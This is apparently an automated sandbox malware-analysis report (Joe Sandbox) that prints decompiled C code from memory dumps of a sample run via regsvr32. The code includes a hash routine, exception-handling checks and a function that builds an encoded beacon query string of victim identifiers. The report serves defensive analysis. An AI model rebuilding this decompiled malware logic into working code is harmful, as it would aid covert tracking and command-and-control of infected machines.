				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x001e310c
0x001e3117
0x001e311a
0x001e311d
0x001e311e
0x001e311e
0x001e3129
0x001e313a
0x001e313c
0x001e313f
0x001e313f
0x001e3142
0x001e3142
0x001e3145
0x001e3145
0x001e3148
0x001e3148
0x001e3165
0x001e3168
0x001e317e
0x001e3181
0x001e319b
0x001e319e
0x001e31b4
0x001e31b7
0x001e31b9
0x001e31d1
0x001e31d4
0x001e31d7
0x001e31ef
0x001e31f2
0x001e320c
0x001e320f
0x001e3225
0x001e3228
0x001e322a
0x001e3242
0x001e3247
0x001e324a
0x001e3260
0x001e3263
0x001e327d
0x001e3280
0x001e3296
0x001e3299
0x001e329b
0x001e32b6
0x001e32b9
0x001e32d0
0x001e32d3
0x001e32d7
0x001e32f0
0x001e32f3
0x001e32f5
0x001e32f8
0x001e3313
0x001e3316
0x001e332f
0x001e3332
0x001e3342
0x001e3345
0x001e335d
0x001e3360
0x001e337a
0x001e337d
0x001e3395
0x001e3398
0x001e33ae
0x001e33b1
0x001e33c9
0x001e33cc
0x001e33e4
0x001e33e7
0x001e3401
0x001e3404
0x001e341a
0x001e341d
0x001e3435
0x001e3438
0x001e3452
0x001e3455
0x001e346d
0x001e3470
0x001e3486
0x001e3489
0x001e34a1
0x001e34a4
0x001e34bc
0x001e34bf
0x001e34d1
0x001e34d4
0x001e34e6
0x001e34e9
0x001e34fb
0x001e34fe
0x001e3502
0x001e3512
0x001e3515
0x001e3523
0x001e3526
0x001e3538
0x001e353b
0x001e354f
0x001e3552
0x001e3554
0x001e3564
0x001e3567
0x001e3579
0x001e357c
0x001e358a
0x001e358d
0x001e359f
0x001e35a2
0x001e35a6
0x001e35b6
0x001e35b9
0x001e35cb
0x001e35ce
0x001e35dc
0x001e35df
0x001e35f1
0x001e35f4
0x001e3606
0x001e3609
0x001e361d
0x001e3620
0x001e3634
0x001e3637
0x001e364b
0x001e364e
0x001e3662
0x001e3665
0x001e3679
0x001e367c
0x001e3690
0x001e3695
0x001e36a7
0x001e36aa
0x001e36be
0x001e36c1
0x001e36d5
0x001e36d8
0x001e36ee
0x001e36f1
0x001e3705
0x001e3708
0x001e371a
0x001e371d
0x001e3731
0x001e3734
0x001e3748
0x001e374b
0x001e375f
0x001e3768
0x001e376b
0x001e3774
0x001e377d
0x001e3785
0x001e378d
0x001e3797
0x001e37ac

APIs

memset.NTDLL ref: 001E37A0

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: caaa9dbbb7e7814dcf9633512e25e7f41fdb6dba46993faf2c792e9f7bab9068
Instruction ID: e109fb931a46b8de37cfb8f006beeb198e121d514344f8c31626229a72c84d1f
Opcode Fuzzy Hash: caaa9dbbb7e7814dcf9633512e25e7f41fdb6dba46993faf2c792e9f7bab9068
Instruction Fuzzy Hash: 9622847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 001E8005, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E8005(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x1ea330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x1ea378 = 1;
										__eflags =  *0x1ea378;
										if( *0x1ea378 != 0) {
											goto L60;
										}
										_t84 =  *0x1ea330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x1ea378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x1ea330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x1ea338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1ea334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1ea338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x1ea338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x1ea378 = 1;
							__eflags =  *0x1ea378;
							if( *0x1ea378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1ea338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x1ea338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x1ea378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x1ea338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x1ea330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x1ea338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x1ea338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x001e800f
0x001e8012
0x001e8018
0x001e8036
0x00000000
0x001e8036
0x001e8020
0x001e8029
0x001e802f
0x001e803e
0x001e8041
0x001e8044
0x001e804e
0x001e804e
0x001e8050
0x001e8053
0x001e8055
0x001e8055
0x001e8057
0x001e805a
0x00000000
0x00000000
0x001e805c
0x001e805e
0x001e80c4
0x001e80c4
0x001e8222
0x00000000
0x001e8222
0x001e8060
0x001e8060
0x001e8064
0x001e8066
0x001e8066
0x001e8066
0x001e8066
0x001e8069
0x001e806a
0x001e806d
0x001e806d
0x001e8071
0x001e8075
0x001e8083
0x001e8083
0x001e808b
0x001e8091
0x001e8093
0x001e8095
0x001e80a5
0x001e80b2
0x001e80b6
0x001e80bb
0x001e80bd
0x001e813b
0x001e813b
0x001e80bf
0x001e80bf
0x001e80bf
0x001e813d
0x001e813f
0x001e8220
0x001e8220
0x00000000
0x001e8145
0x001e8145
0x001e814c
0x00000000
0x00000000
0x001e8152
0x001e8156
0x001e81b2
0x001e81b4
0x001e81bc
0x001e81be
0x001e81c0
0x00000000
0x00000000
0x001e81c2
0x001e81c8
0x001e81ca
0x001e81cc
0x001e81e1
0x001e81e1
0x001e81e3
0x001e8212
0x001e8219
0x00000000
0x001e8219
0x001e81e7
0x001e81e8
0x001e81ea
0x001e81ec
0x001e81ec
0x001e81ee
0x001e81f0
0x001e81f2
0x001e8206
0x001e8206
0x001e8209
0x001e820b
0x001e820b
0x001e820c
0x001e820c
0x00000000
0x001e81f4
0x001e81f4
0x001e81f4
0x001e81fd
0x001e81fe
0x001e8200
0x001e8202
0x001e8202
0x00000000
0x001e81f4
0x001e81f2
0x001e81ce
0x001e81d5
0x001e81d5
0x001e81d7
0x00000000
0x00000000
0x001e81d9
0x001e81da
0x001e81dd
0x001e81df
0x00000000
0x00000000
0x00000000
0x001e81df
0x00000000
0x001e81d5
0x001e8158
0x001e815b
0x001e8160
0x00000000
0x00000000
0x001e8169
0x001e816b
0x001e8171
0x00000000
0x00000000
0x001e8177
0x001e817d
0x00000000
0x00000000
0x001e8183
0x001e8185
0x001e818e
0x001e8192
0x00000000
0x00000000
0x001e8198
0x001e819b
0x001e819d
0x00000000
0x00000000
0x001e81a4
0x001e81a6
0x00000000
0x00000000
0x001e81a8
0x001e81ac
0x00000000
0x00000000
0x00000000
0x001e81ac
0x00000000
0x00000000
0x00000000
0x001e8097
0x001e8097
0x001e8097
0x001e809e
0x00000000
0x00000000
0x001e80a0
0x001e80a1
0x001e80a3
0x00000000
0x00000000
0x00000000
0x001e80a3
0x001e80cb
0x001e80cd
0x00000000
0x00000000
0x001e80dd
0x001e80df
0x001e80e1
0x00000000
0x00000000
0x001e80e7
0x001e80ee
0x001e811a
0x001e811a
0x001e811c
0x001e811e
0x001e8132
0x001e8134
0x00000000
0x00000000
0x00000000
0x00000000
0x001e8120
0x001e8120
0x001e8120
0x001e8129
0x001e812a
0x001e812c
0x001e812e
0x001e812e
0x00000000
0x001e8120
0x001e80f0
0x001e80f0
0x001e80f3
0x001e80f5
0x001e8107
0x001e8107
0x001e810a
0x001e810c
0x001e810c
0x001e810d
0x001e810d
0x001e8113
0x001e8113
0x00000000
0x00000000
0x00000000
0x00000000
0x001e80f7
0x001e80f7
0x001e80f7
0x001e80fe
0x00000000
0x00000000
0x001e8100
0x001e8100
0x001e8101
0x00000000
0x00000000
0x00000000
0x001e8101
0x001e8103
0x001e8105
0x001e8118
0x00000000
0x00000000
0x00000000
0x001e8118
0x00000000
0x001e8105
0x001e8077
0x001e807a
0x001e807d
0x00000000
0x00000000
0x001e807f
0x001e8081
0x00000000
0x00000000
0x00000000
0x001e8081
0x001e8046
0x001e8048
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 001E80B6

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: c2531892ccff3dd120127d76e62ac31d3184631d55304a45ac4990ca02f35ea1
Instruction ID: a7ab50c8864ca028ba64f158bdfd6208da7c831f80bdeb87ac117d8ab3dc48b4
Opcode Fuzzy Hash: c2531892ccff3dd120127d76e62ac31d3184631d55304a45ac4990ca02f35ea1
Instruction Fuzzy Hash: 7B61B230600EC28FDB29CF2AD9D062D73A2FF95754B248169E95ACB694EF31DC86C641

Uniqueness

Uniqueness Score: -1.00%

Function 001E7DE0, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E001E7DE0(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E001E7F4B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E001E8005(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E001E7EF0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E001E7F4B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E001E7FE7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x001e7de4
0x001e7de5
0x001e7de6
0x001e7de9
0x001e7deb
0x001e7dee
0x001e7def
0x001e7df1
0x001e7df2
0x001e7df3
0x001e7df6
0x001e7e00
0x001e7eb1
0x001e7eb8
0x001e7ec1
0x001e7e06
0x001e7e06
0x001e7e0c
0x001e7e12
0x001e7e15
0x001e7e18
0x001e7e1c
0x001e7e21
0x001e7e26
0x001e7ea6
0x00000000
0x001e7e28
0x001e7e28
0x001e7e34
0x001e7e36
0x001e7e91
0x001e7e91
0x001e7e97
0x00000000
0x001e7e38
0x001e7e47
0x001e7e49
0x001e7e4a
0x001e7e4b
0x001e7e4e
0x001e7e4e
0x001e7e50
0x00000000
0x001e7e52
0x001e7e52
0x001e7e9c
0x001e7e54
0x001e7e54
0x001e7e58
0x001e7e60
0x001e7e65
0x001e7e6a
0x001e7e76
0x001e7e7e
0x001e7e85
0x001e7e8b
0x001e7e8f
0x00000000
0x001e7e8f
0x001e7e52
0x001e7e50
0x00000000
0x001e7e36
0x001e7eaa
0x001e7eaa
0x001e7eaa
0x001e7e26
0x001e7ec6
0x001e7ecd

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: c4c92c3dbb84ec571dcf462018c15ce4050d24a53ed6d62ca9596a3ee3970e2c
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 8B21C4339046449BDB14EF69C8808ABBBA5FF44310B0A84A8E8599B285D730FD15C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 001E6EFC, Relevance: 34.7, APIs: 23, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001E6EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x1ea290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x1ea018; // 0xff401b7a
					asm("bswap eax");
					_t32 =  *0x1ea014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x1ea010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x1ea00c; // 0x8e03bf7
					asm("bswap eax");
					_t35 =  *0x1ea2d4; // 0x4c1d5a8
					_t2 = _t35 + 0x1eb613; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x1ea02c,  *0x1ea004, _t110);
					_t38 = E001E6A09();
					_t39 =  *0x1ea2d4; // 0x4c1d5a8
					_t3 = _t39 + 0x1eb653; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x1ea2d4; // 0x4c1d5a8
						_t7 = _t92 + 0x1eb65e; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E001E5040(_t99);
					_t44 =  *0x1ea2d4; // 0x4c1d5a8
					_t9 = _t44 + 0x1eb302; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x1ea2d4; // 0x4c1d5a8
					_t11 = _t48 + 0x1eb2d7; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x1ea32c; // 0x4e095b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x1ea2d4; // 0x4c1d5a8
						_t13 = _t88 + 0x1eb676; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x1ea37c; // 0x4e09630
					_a28 = E001E2885(0x1ea00a, _t105 + 4);
					_t55 =  *0x1ea31c; // 0x4e095e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x1ea2d4; // 0x4c1d5a8
						_t16 = _t84 + 0x1eb8da; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x1ea318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x1ea2d4; // 0x4c1d5a8
						_t18 = _t81 + 0x1eb8b1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x1ea290, _t107, 0x800);
						if(_t98 != _t107) {
							E001E2DD0(GetTickCount());
							_t62 =  *0x1ea37c; // 0x4e09630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x1ea37c; // 0x4e09630
							__imp__(_t66 + 0x40);
							_t68 =  *0x1ea37c; // 0x4e09630
							_t115 = E001E624D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x1e92ac);
								_push(_t115);
								_t108 = E001E21C1();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E001E1032(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E001E1492();
									}
									HeapFree( *0x1ea290, 0, _v24);
								}
								HeapFree( *0x1ea290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x1ea290, _t107, _t98);
						}
						HeapFree( *0x1ea290, _t107, _a20);
					}
					HeapFree( *0x1ea290, _t107, _t117);
				}
